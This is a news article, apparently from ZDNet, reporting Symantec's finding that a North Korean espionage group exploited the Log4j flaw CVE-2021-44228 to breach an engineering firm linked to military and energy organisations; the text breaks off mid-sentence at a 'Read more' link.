Hackers used the Log4j flaw to gain access before moving across a company’s network, say security researchers

Share on facebook
Share on twitter
Share on linkedin
Share on reddit

A North Korean hacking and cyber-espionage operation breached the network of an engineering firm linked to military and energy organisations by exploiting a cybersecurity vulnerability in Log4j. 

First detailed in December, the vulnerability (CVE-2021-44228) allows attackers to remotely execute code and gain access to systems that use Log4j, a widely used Java logging library. 

The ubiquitous nature of Log4j meant cybersecurity agencies urged organisations globally to apply security updates as quickly as possible, but months on from disclosure, many are still vulnerable to the flaw

ZDNet Recommends

According to cybersecurity researchers at Symantec, one of those companies that was still vulnerable was an undisclosed engineering firm that works in the energy and military sectors. That vulnerability resulted in the company being breached when attackers exploited the gap on a public-facing VMware View server in February this year. From there, attackers were able to move around the network and compromise at least 18 computers. 

SEE: Google: Multiple hacking groups are using the war in Ukraine as a lure in phishing attempts

Analysis by Symantec researchers suggests that the campaign is by a group they call Stonefly, also known as DarkSeoul, BlackMine, Operation Troy, and Silent Chollima, which is an espionage group working out of North Korea.  

Other cybersecurity researchers have suggested that Stonefly has links with Lazarus Group, North Korea’s most infamous hacking operation. 

But while Lazarus Group’s activity often focuses on stealing money and

Read more

Explore the site

More from the blog

Latest News